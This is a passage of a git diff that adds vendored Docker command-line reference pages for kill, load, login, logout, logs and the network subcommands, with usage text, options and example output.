+fields, by default you get a Go-style dump of the inner values. +Docker adds a template function, `json`, which can be applied to get +results in JSON format. 
+ + {% raw %} + $ docker inspect --format='{{json .Config}}' $INSTANCE_ID + {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/kill.md b/vendor/github.com/docker/docker/docs/reference/commandline/kill.md new file mode 100644 index 0000000000..32fde3d8b5 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/kill.md @@ -0,0 +1,34 @@ +--- +title: "kill" +description: "The kill command description and usage" +keywords: "container, kill, signal" +--- + + + +# kill + +```markdown +Usage: docker kill [OPTIONS] CONTAINER [CONTAINER...] + +Kill one or more running containers + +Options: + --help Print usage + -s, --signal string Signal to send to the container (default "KILL") +``` + +The main process inside the container will be sent `SIGKILL`, or any +signal specified with option `--signal`. + +> **Note:** +> `ENTRYPOINT` and `CMD` in the *shell* form run as a subcommand of `/bin/sh -c`, +> which does not pass signals. This means that the executable is not the container’s PID 1 +> and does not receive Unix signals. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/load.md b/vendor/github.com/docker/docker/docs/reference/commandline/load.md new file mode 100644 index 0000000000..04a5bc7e56 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/load.md @@ -0,0 +1,53 @@ +--- +title: "load" +description: "The load command description and usage" +keywords: "stdin, tarred, repository" +--- + + + +# load + +```markdown +Usage: docker load [OPTIONS] + +Load an image from a tar archive or STDIN + +Options: + --help Print usage + -i, --input string Read from tar archive file, instead of STDIN. + The tarball may be compressed with gzip, bzip, or xz + -q, --quiet Suppress the load output but still outputs the imported images +``` + +Loads a tarred repository from a file or the standard input stream. +Restores both images and tags. 
+ + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + $ docker load < busybox.tar.gz + # […] + Loaded image: busybox:latest + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + busybox latest 769b9341d937 7 weeks ago 2.489 MB + $ docker load --input fedora.tar + # […] + Loaded image: fedora:rawhide + # […] + Loaded image: fedora:20 + # […] + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + busybox latest 769b9341d937 7 weeks ago 2.489 MB + fedora rawhide 0d20aec6529d 7 weeks ago 387 MB + fedora 20 58394af37342 7 weeks ago 385.5 MB + fedora heisenbug 58394af37342 7 weeks ago 385.5 MB + fedora latest 58394af37342 7 weeks ago 385.5 MB diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/login.md b/vendor/github.com/docker/docker/docs/reference/commandline/login.md new file mode 100644 index 0000000000..a0f35fd4d0 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/login.md @@ -0,0 +1,122 @@ +--- +title: "login" +description: "The login command description and usage" +keywords: "registry, login, image" +--- + + + +# login + +```markdown +Usage: docker login [OPTIONS] [SERVER] + +Log in to a Docker registry. +If no server is specified, the default is defined by the daemon. + +Options: + --help Print usage + -p, --password string Password + -u, --username string Username +``` + +If you want to login to a self-hosted registry you can specify this by +adding the server name. + + example: + $ docker login localhost:8080 + + +`docker login` requires user to use `sudo` or be `root`, except when: + +1. connecting to a remote daemon, such as a `docker-machine` provisioned `docker engine`. +2. user is added to the `docker` group. This will impact the security of your system; the `docker` group is `root` equivalent. See [Docker Daemon Attack Surface](https://docs.docker.com/security/security/#docker-daemon-attack-surface) for details. 
+ +You can log into any public or private repository for which you have +credentials. When you log in, the command stores encoded credentials in +`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows. + +## Credentials store + +The Docker Engine can keep user credentials in an external credentials store, +such as the native keychain of the operating system. Using an external store +is more secure than storing credentials in the Docker configuration file. + +To use a credentials store, you need an external helper program to interact +with a specific keychain or external store. Docker requires the helper +program to be in the client's host `$PATH`. + +This is the list of currently available credentials helpers and where +you can download them from: + +- D-Bus Secret Service: https://github.com/docker/docker-credential-helpers/releases +- Apple macOS keychain: https://github.com/docker/docker-credential-helpers/releases +- Microsoft Windows Credential Manager: https://github.com/docker/docker-credential-helpers/releases + +### Usage + +You need to specify the credentials store in `$HOME/.docker/config.json` +to tell the docker engine to use it: + +```json +{ + "credsStore": "osxkeychain" +} +``` + +If you are currently logged in, run `docker logout` to remove +the credentials from the file and run `docker login` again. + +### Protocol + +Credential helpers can be any program or script that follows a very simple protocol. +This protocol is heavily inspired by Git, but it differs in the information shared. + +The helpers always use the first argument in the command to identify the action. +There are only three possible values for that argument: `store`, `get`, and `erase`. + +The `store` command takes a JSON payload from the standard input. That payload carries +the server address, to identify the credential, the user name, and either a password +or an identity token. 
+ +```json +{ + "ServerURL": "https://index.docker.io/v1", + "Username": "david", + "Secret": "passw0rd1" +} +``` + +If the secret being stored is an identity token, the Username should be set to +`<token>`. + +The `store` command can write error messages to `STDOUT` that the docker engine +will show if there was an issue. + +The `get` command takes a string payload from the standard input. That payload carries +the server address that the docker engine needs credentials for. This is +an example of that payload: `https://index.docker.io/v1`. + +The `get` command writes a JSON payload to `STDOUT`. Docker reads the user name +and password from this payload: + +```json +{ + "Username": "david", + "Secret": "passw0rd1" +} +``` + +The `erase` command takes a string payload from `STDIN`. That payload carries +the server address that the docker engine wants to remove credentials for. This is +an example of that payload: `https://index.docker.io/v1`. + +The `erase` command can write error messages to `STDOUT` that the docker engine +will show if there was an issue. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logout.md b/vendor/github.com/docker/docker/docs/reference/commandline/logout.md new file mode 100644 index 0000000000..1635e2244b --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/logout.md @@ -0,0 +1,30 @@ +--- +title: "logout" +description: "The logout command description and usage" +keywords: "logout, docker, registry" +--- + + + +# logout + +```markdown +Usage: docker logout [SERVER] + +Log out from a Docker registry. +If no server is specified, the default is defined by the daemon.
+ +Options: + --help Print usage +``` + +For example: + + $ docker logout localhost:8080 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/logs.md new file mode 100644 index 0000000000..891e10b55c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/logs.md @@ -0,0 +1,66 @@ +--- +title: "logs" +description: "The logs command description and usage" +keywords: "logs, retrieve, docker" +--- + + + +# logs + +```markdown +Usage: docker logs [OPTIONS] CONTAINER + +Fetch the logs of a container + +Options: + --details Show extra details provided to logs + -f, --follow Follow log output + --help Print usage + --since string Show logs since timestamp + --tail string Number of lines to show from the end of the logs (default "all") + -t, --timestamps Show timestamps +``` + +The `docker logs` command batch-retrieves logs present at the time of execution. + +> **Note**: this command is only functional for containers that are started with +> the `json-file` or `journald` logging driver. + +For more information about selecting and configuring logging drivers, refer to +[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/). + +The `docker logs --follow` command will continue streaming the new output from +the container's `STDOUT` and `STDERR`. + +Passing a negative number or a non-integer to `--tail` is invalid and the +value is set to `all` in that case. + +The `docker logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants) +, for example `2014-09-16T06:17:46.000000000Z`, to each +log entry. To ensure that the timestamps are aligned the +nano-second part of the timestamp will be padded with zero when necessary. + +The `docker logs --details` command will add on extra attributes, such as +environment variables and labels, provided to `--log-opt` when creating the +container. 
+ +The `--since` option shows only the container logs generated after +a given date. You can specify the date as an RFC 3339 date, a UNIX +timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date +format you may also use RFC3339Nano, `2006-01-02T15:04:05`, +`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local +timezone on the client will be used if you do not provide either a `Z` or a +`+-00:00` timezone offset at the end of the timestamp. When providing Unix +timestamps enter seconds[.nanoseconds], where seconds is the number of seconds +that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap +seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a +fraction of a second no more than nine digits long. You can combine the +`--since` option with either or both of the `--follow` or `--tail` options. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/menu.md b/vendor/github.com/docker/docker/docs/reference/commandline/menu.md new file mode 100644 index 0000000000..d58afacd76 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/menu.md @@ -0,0 +1,28 @@ +--- +title: "Command line reference" +description: "Docker's CLI command description and usage" +keywords: "Docker, Docker documentation, CLI, command line" +identifier: "smn_cli" +--- + + + +# The Docker commands + +This section contains reference information on using Docker's command line +client. Each command has a reference page along with samples. If you are +unfamiliar with the command line, you should start by reading about how to +[Use the Docker command line](cli.md). + +You start the Docker daemon with the command line. How you start the daemon +affects your Docker containers. For that reason you should also make sure to +read the [`dockerd`](dockerd.md) reference page. + +For a list of Docker commands see [Command line reference guide](index.md). 
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md new file mode 100644 index 0000000000..52459a5d5f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md @@ -0,0 +1,100 @@ +--- +title: "network connect" +description: "The network connect command description and usage" +keywords: "network, connect, user-defined" +--- + + + +# network connect + +```markdown +Usage: docker network connect [OPTIONS] NETWORK CONTAINER + +Connect a container to a network + +Options: + --alias value Add network-scoped alias for the container (default []) + --help Print usage + --ip string IP Address + --ip6 string IPv6 Address + --link value Add link to another container (default []) + --link-local-ip value Add a link-local address for the container (default []) +``` + +Connects a container to a network. You can connect a container by name +or by ID. Once connected, the container can communicate with other containers in +the same network. + +```bash +$ docker network connect multi-host-network container1 +``` + +You can also use the `docker run --network=` option to start a container and immediately connect it to a network. + +```bash +$ docker run -itd --network=multi-host-network busybox +``` + +You can specify the IP address you want to be assigned to the container's interface. + +```bash +$ docker network connect --ip 10.10.36.122 multi-host-network container2 +``` + +You can use `--link` option to link another container with a preferred alias + +```bash +$ docker network connect --link container1:c1 multi-host-network container2 +``` + +`--alias` option can be used to resolve the container by another name in the network +being connected to. + +```bash +$ docker network connect --alias db --alias mysql multi-host-network container2 +``` +You can pause, restart, and stop containers that are connected to a network. 
+A container connects to its configured networks when it runs. + +If specified, the container's IP address(es) is reapplied when a stopped +container is restarted. If the IP address is no longer available, the container +fails to start. One way to guarantee that the IP address is available is +to specify an `--ip-range` when creating the network, and choose the static IP +address(es) from outside that range. This ensures that the IP address is not +given to another container while this container is not on the network. + +```bash +$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network +``` + +```bash +$ docker network connect --ip 172.20.128.2 multi-host-network container2 +``` + +To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network. + +Once connected in a network, containers can communicate using only another +container's IP address or name. For `overlay` networks or custom plugins that +support multi-host connectivity, containers connected to the same multi-host +network but launched from different Engines can also communicate in this way. + +You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container to both bridge and overlay networks.
+ +## Related information + +* [network inspect](network_inspect.md) +* [network create](network_create.md) +* [network disconnect](network_disconnect.md) +* [network ls](network_ls.md) +* [network rm](network_rm.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) +* [Work with networks](https://docs.docker.com/engine/userguide/networking/work-with-networks/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md new file mode 100644 index 0000000000..e238217d41 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md @@ -0,0 +1,202 @@ +--- +title: "network create" +description: "The network create command description and usage" +keywords: "network, create" +--- + + + +# network create + +```markdown +Usage: docker network create [OPTIONS] NETWORK + +Create a network + +Options: + --attachable Enable manual container attachment + --aux-address value Auxiliary IPv4 or IPv6 addresses used by Network + driver (default map[]) + -d, --driver string Driver to manage the Network (default "bridge") + --gateway value IPv4 or IPv6 Gateway for the master subnet (default []) + --help Print usage + --internal Restrict external access to the network + --ip-range value Allocate container ip from a sub-range (default []) + --ipam-driver string IP Address Management Driver (default "default") + --ipam-opt value Set IPAM driver specific options (default map[]) + --ipv6 Enable IPv6 networking + --label value Set metadata on a network (default []) + -o, --opt value Set driver specific options (default map[]) + --subnet value Subnet in CIDR format that represents a + network segment (default []) +``` + +Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the +built-in network drivers. 
If you have installed a third party or your own custom +network driver you can specify that `DRIVER` here also. If you don't specify the +`--driver` option, the command automatically creates a `bridge` network for you. +When you install Docker Engine it creates a `bridge` network automatically. This +network corresponds to the `docker0` bridge that Engine has traditionally relied +on. When you launch a new container with `docker run` it automatically connects to +this bridge network. You cannot remove this default bridge network, but you can +create new ones using the `network create` command. + +```bash +$ docker network create -d bridge my-bridge-network +``` + +Bridge networks are isolated networks on a single Engine installation. If you +want to create a network that spans multiple Docker hosts each running an +Engine, you must create an `overlay` network. Unlike `bridge` networks, overlay +networks require some pre-existing conditions before you can create one. These +conditions are: + +* Access to a key-value store. Engine supports Consul, Etcd, and ZooKeeper (Distributed store) key-value stores. +* A cluster of hosts with connectivity to the key-value store. +* A properly configured Engine `daemon` on each host in the cluster. + +The `dockerd` options that support the `overlay` network are: + +* `--cluster-store` +* `--cluster-store-opt` +* `--cluster-advertise` + +To read more about these options and how to configure them, see ["*Get started +with multi-host network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay). + +While not required, it is a good idea to install Docker Swarm to +manage the cluster that makes up your network. Swarm provides sophisticated +discovery and server management tools that can assist your implementation. 
+ +Once you have prepared the `overlay` network prerequisites you simply choose a +Docker host in the cluster and issue the following to create the network: + +```bash +$ docker network create -d overlay my-multihost-network +``` + +Network names must be unique. The Docker daemon attempts to identify naming +conflicts but this is not guaranteed. It is the user's responsibility to avoid +name conflicts. + +## Connect containers + +When you start a container, use the `--network` flag to connect it to a network. +This example adds the `busybox` container to the `mynet` network: + +```bash +$ docker run -itd --network=mynet busybox +``` + +If you want to add a container to a network after the container is already +running, use the `docker network connect` subcommand. + +You can connect multiple containers to the same network. Once connected, the +containers can communicate using only another container's IP address or name. +For `overlay` networks or custom plugins that support multi-host connectivity, +containers connected to the same multi-host network but launched from different +Engines can also communicate in this way. + +You can disconnect a container from a network using the `docker network +disconnect` command. + +## Specifying advanced options + +When you create a network, Engine creates a non-overlapping subnetwork for the +network by default. This subnetwork is not a subdivision of an existing +network. It is purely for ip-addressing purposes. You can override this default +and specify subnetwork values directly using the `--subnet` option. On a +`bridge` network you can only create a single subnet: + +```bash +$ docker network create --driver=bridge --subnet=192.168.0.0/16 br0 +``` + +Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address` +options. 
+ +```bash +$ docker network create \ + --driver=bridge \ + --subnet=172.28.0.0/16 \ + --ip-range=172.28.5.0/24 \ + --gateway=172.28.5.254 \ + br0 +``` + +If you omit the `--gateway` flag the Engine selects one for you from inside a +preferred pool. For `overlay` networks and for network driver plugins that +support it you can create multiple subnetworks. + +```bash +$ docker network create -d overlay \ + --subnet=192.168.0.0/16 \ + --subnet=192.170.0.0/16 \ + --gateway=192.168.0.100 \ + --gateway=192.170.0.100 \ + --ip-range=192.168.1.0/24 \ + --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \ + --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \ + my-multihost-network +``` + +Be sure that your subnetworks do not overlap. If they do, the network create +fails and Engine returns an error. + +# Bridge driver options + +When creating a custom network, the default network driver (i.e. `bridge`) has +additional options that can be passed. The following are those options and the +equivalent docker daemon flags used for docker0 bridge: + +| Option | Equivalent | Description | +|--------------------------------------------------|-------------|-------------------------------------------------------| +| `com.docker.network.bridge.name` | - | bridge name to be used when creating the Linux bridge | +| `com.docker.network.bridge.enable_ip_masquerade` | `--ip-masq` | Enable IP masquerading | +| `com.docker.network.bridge.enable_icc` | `--icc` | Enable or Disable Inter Container Connectivity | +| `com.docker.network.bridge.host_binding_ipv4` | `--ip` | Default IP when binding container ports | +| `com.docker.network.driver.mtu` | `--mtu` | Set the containers network MTU | + +The following arguments can be passed to `docker network create` for any +network driver, again with their approximate equivalents to `docker daemon`. 
+ +| Argument | Equivalent | Description | +|--------------|----------------|--------------------------------------------| +| `--gateway` | - | IPv4 or IPv6 Gateway for the master subnet | +| `--ip-range` | `--fixed-cidr` | Allocate IPs from a range | +| `--internal` | - | Restrict external access to the network | +| `--ipv6` | `--ipv6` | Enable IPv6 networking | +| `--subnet` | `--bip` | Subnet for network | + +For example, let's use `-o` or `--opt` options to specify an IP address binding +when publishing ports: + +```bash +$ docker network create \ + -o "com.docker.network.bridge.host_binding_ipv4"="172.19.0.1" \ + simple-network +``` + +### Network internal mode + +By default, when you connect a container to an `overlay` network, Docker also +connects a bridge network to it to provide external connectivity. If you want +to create an externally isolated `overlay` network, you can specify the +`--internal` option. + +## Related information + +* [network inspect](network_inspect.md) +* [network connect](network_connect.md) +* [network disconnect](network_disconnect.md) +* [network ls](network_ls.md) +* [network rm](network_rm.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md new file mode 100644 index 0000000000..42e976a500 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md @@ -0,0 +1,43 @@ +--- +title: "network disconnect" +description: "The network disconnect command description and usage" +keywords: "network, disconnect, user-defined" +--- + + + +# network disconnect + +```markdown +Usage: docker network disconnect [OPTIONS] NETWORK CONTAINER + +Disconnect a container from a network + +Options: + -f, --force Force the container to disconnect from a 
network + --help Print usage +``` + +Disconnects a container from a network. The container must be running to disconnect it from the network. + +```bash + $ docker network disconnect multi-host-network container1 +``` + + +## Related information + +* [network inspect](network_inspect.md) +* [network connect](network_connect.md) +* [network create](network_create.md) +* [network ls](network_ls.md) +* [network rm](network_rm.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md new file mode 100644 index 0000000000..bc0005e38e --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md @@ -0,0 +1,192 @@ +--- +title: "network inspect" +description: "The network inspect command description and usage" +keywords: "network, inspect, user-defined" +--- + + + +# network inspect + +```markdown +Usage: docker network inspect [OPTIONS] NETWORK [NETWORK...] + +Display detailed information on one or more networks + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + +Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network: + +```bash +$ sudo docker run -itd --name=container1 busybox +f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27 + +$ sudo docker run -itd --name=container2 busybox +bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727 +``` + +The `network inspect` command shows the containers, by id, in its +results. For networks backed by multi-host network driver, such as Overlay, +this command also shows the container endpoints in other hosts in the +cluster. 
These endpoints are represented as "ep-{endpoint-id}" in the output. +However, for swarm-scoped networks, only the endpoints that are local to the +node are shown. + +You can specify an alternate format to execute a given +template for each result. Go's +[text/template](http://golang.org/pkg/text/template/) package describes all the +details of the format. + +```bash +$ sudo docker network inspect bridge +[ + { + "Name": "bridge", + "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f", + "Created": "2016-10-19T04:33:30.360899459Z", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.42.1/16", + "Gateway": "172.17.42.1" + } + ] + }, + "Internal": false, + "Containers": { + "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": { + "Name": "container2", + "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + }, + "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": { + "Name": "container1", + "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad", + "MacAddress": "02:42:ac:11:00:01", + "IPv4Address": "172.17.0.1/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": {} + } +] +``` + +Returns the information about the user-defined network: + +```bash +$ docker network create simple-network +69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a +$ docker network inspect simple-network +[ + { + "Name": "simple-network", + "Id": 
"69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a", + "Created": "2016-10-19T04:33:30.360899459Z", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.22.0.0/16", + "Gateway": "172.22.0.1" + } + ] + }, + "Containers": {}, + "Options": {}, + "Labels": {} + } +] +``` + +For swarm mode overlay networks `network inspect` also shows the IP address and node name +of the peers. Peers are the nodes in the swarm cluster which have at least one task attached +to the network. Node name is of the format `-`. + +```bash +$ docker network inspect ingress +[ + { + "Name": "ingress", + "Id": "j0izitrut30h975vk4m1u5kk3", + "Created": "2016-11-08T06:49:59.803387552Z", + "Scope": "swarm", + "Driver": "overlay", + "EnableIPv6": false, + "IPAM": { + "Driver": "default", + "Options": null, + "Config": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + }, + "Internal": false, + "Attachable": false, + "Containers": { + "ingress-sbox": { + "Name": "ingress-endpoint", + "EndpointID": "40e002d27b7e5d75f60bc72199d8cae3344e1896abec5eddae9743755fe09115", + "MacAddress": "02:42:0a:ff:00:03", + "IPv4Address": "10.255.0.3/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.driver.overlay.vxlanid_list": "256" + }, + "Labels": {}, + "Peers": [ + { + "Name": "net-1-1d22adfe4d5c", + "IP": "192.168.33.11" + }, + { + "Name": "net-2-d55d838b34af", + "IP": "192.168.33.12" + }, + { + "Name": "net-3-8473f8140bd9", + "IP": "192.168.33.13" + } + ] + } +] +``` + +## Related information + +* [network disconnect ](network_disconnect.md) +* [network connect](network_connect.md) +* [network create](network_create.md) +* [network ls](network_ls.md) +* [network rm](network_rm.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md 
b/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md new file mode 100644 index 0000000000..a4f671d569 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md @@ -0,0 +1,218 @@ +--- +title: "network ls" +description: "The network ls command description and usage" +keywords: "network, list, user-defined" +--- + + + +# docker network ls + +```markdown +Usage: docker network ls [OPTIONS] + +List networks + +Aliases: + ls, list + +Options: + -f, --filter filter Provide filter values (e.g. 'driver=bridge') + --format string Pretty-print networks using a Go template + --help Print usage + --no-trunc Do not truncate the output + -q, --quiet Only display network IDs +``` + +Lists all the networks the Engine `daemon` knows about. This includes the +networks that span across multiple hosts in a cluster, for example: + +```bash +$ sudo docker network ls +NETWORK ID NAME DRIVER SCOPE +7fca4eb8c647 bridge bridge local +9f904ee27bf5 none null local +cf03ee007fb4 host host local +78b03ee04fc4 multi-host overlay swarm +``` + +Use the `--no-trunc` option to display the full network id: + +```bash +$ docker network ls --no-trunc +NETWORK ID NAME DRIVER SCOPE +18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3 none null local +c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47 host host local +7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185 bridge bridge local +95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd foo bridge local +63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 dev bridge local +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there +is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). +Multiple filter flags are combined as an `OR` filter. For example, +`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks. 
+ +The currently supported filters are: + +* driver +* id (network's id) +* label (`label=<key>` or `label=<key>=<value>`) +* name (network's name) +* type (custom|builtin) + +#### Driver + +The `driver` filter matches networks based on their driver. + +The following example matches networks with the `bridge` driver: + +```bash +$ docker network ls --filter driver=bridge +NETWORK ID NAME DRIVER SCOPE +db9db329f835 test1 bridge local +f6e212da9dfd test2 bridge local +``` + +#### ID + +The `id` filter matches on all or part of a network's ID. + +The following filter matches all networks with an ID containing the +`63d1ff1f77b0...` string. + +```bash +$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 +NETWORK ID NAME DRIVER SCOPE +63d1ff1f77b0 dev bridge local +``` + +You can also filter for a substring in an ID as this shows: + +```bash +$ docker network ls --filter id=95e74588f40d +NETWORK ID NAME DRIVER SCOPE +95e74588f40d foo bridge local + +$ docker network ls --filter id=95e +NETWORK ID NAME DRIVER SCOPE +95e74588f40d foo bridge local +``` + +#### Label + +The `label` filter matches networks based on the presence of a `label` alone or a `label` and a +value. + +The following filter matches networks with the `usage` label regardless of its value. + +```bash +$ docker network ls -f "label=usage" +NETWORK ID NAME DRIVER SCOPE +db9db329f835 test1 bridge local +f6e212da9dfd test2 bridge local +``` + +The following filter matches networks with the `usage` label with the `prod` value. + +```bash +$ docker network ls -f "label=usage=prod" +NETWORK ID NAME DRIVER SCOPE +f6e212da9dfd test2 bridge local +``` + +#### Name + +The `name` filter matches on all or part of a network's name. + +The following filter matches all networks with a name containing the `foobar` string.
+ +```bash +$ docker network ls --filter name=foobar +NETWORK ID NAME DRIVER SCOPE +06e7eef0a170 foobar bridge local +``` + +You can also filter for a substring in a name as this shows: + +```bash +$ docker network ls --filter name=foo +NETWORK ID NAME DRIVER SCOPE +95e74588f40d foo bridge local +06e7eef0a170 foobar bridge local +``` + +#### Type + +The `type` filter supports two values; `builtin` displays predefined networks +(`bridge`, `none`, `host`), whereas `custom` displays user defined networks. + +The following filter matches all user defined networks: + +```bash +$ docker network ls --filter type=custom +NETWORK ID NAME DRIVER SCOPE +95e74588f40d foo bridge local +63d1ff1f77b0 dev bridge local +``` + +By having this flag it allows for batch cleanup. For example, use this filter +to delete all user defined networks: + +```bash +$ docker network rm `docker network ls --filter type=custom -q` +``` + +A warning will be issued when trying to remove a network that has containers +attached. + +## Formatting + +The formatting options (`--format`) pretty-prints networks output +using a Go template. + +Valid placeholders for the Go template are listed below: + +Placeholder | Description +------------|------------------------------------------------------------------------------------------ +`.ID` | Network ID +`.Name` | Network name +`.Driver` | Network driver +`.Scope` | Network scope (local, global) +`.IPv6` | Whether IPv6 is enabled on the network or not. +`.Internal` | Whether the network is internal or not. +`.Labels` | All labels assigned to the network. +`.Label` | Value of a specific label for this network. For example `{{.Label "project.version"}}` + +When using the `--format` option, the `network ls` command will either +output the data exactly as the template declares or, when using the +`table` directive, includes column headers as well. 
+ +The following example uses a template without headers and outputs the +`ID` and `Driver` entries separated by a colon for all networks: + +```bash +$ docker network ls --format "{{.ID}}: {{.Driver}}" +afaaab448eb2: bridge +d1584f8dc718: host +391df270dc66: null +``` + +## Related information + +* [network disconnect ](network_disconnect.md) +* [network connect](network_connect.md) +* [network create](network_create.md) +* [network inspect](network_inspect.md) +* [network rm](network_rm.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md new file mode 100644 index 0000000000..5b65465600 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md @@ -0,0 +1,45 @@ +--- +title: "network prune" +description: "Remove unused networks" +keywords: "network, prune, delete" +--- + +# network prune + +```markdown +Usage: docker network prune [OPTIONS] + +Remove all unused networks + +Options: + -f, --force Do not prompt for confirmation + --help Print usage +``` + +Remove all unused networks. Unused networks are those which are not referenced by any containers. + +Example output: + +```bash +$ docker network prune +WARNING! This will remove all networks not used by at least one container. +Are you sure you want to continue? 
[y/N] y +Deleted Networks: +n1 +n2 +``` + +## Related information + +* [network disconnect ](network_disconnect.md) +* [network connect](network_connect.md) +* [network create](network_create.md) +* [network ls](network_ls.md) +* [network inspect](network_inspect.md) +* [network rm](network_rm.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) +* [system df](system_df.md) +* [container prune](container_prune.md) +* [image prune](image_prune.md) +* [volume prune](volume_prune.md) +* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md new file mode 100644 index 0000000000..f06b4c002d --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md @@ -0,0 +1,59 @@ +--- +title: "network rm" +description: "the network rm command description and usage" +keywords: "network, rm, user-defined" +--- + + + +# network rm + +```markdown +Usage: docker network rm NETWORK [NETWORK...] + +Remove one or more networks + +Aliases: + rm, remove + +Options: + --help Print usage +``` + +Removes one or more networks by name or identifier. To remove a network, +you must first disconnect any containers connected to it. +To remove the network named 'my-network': + +```bash + $ docker network rm 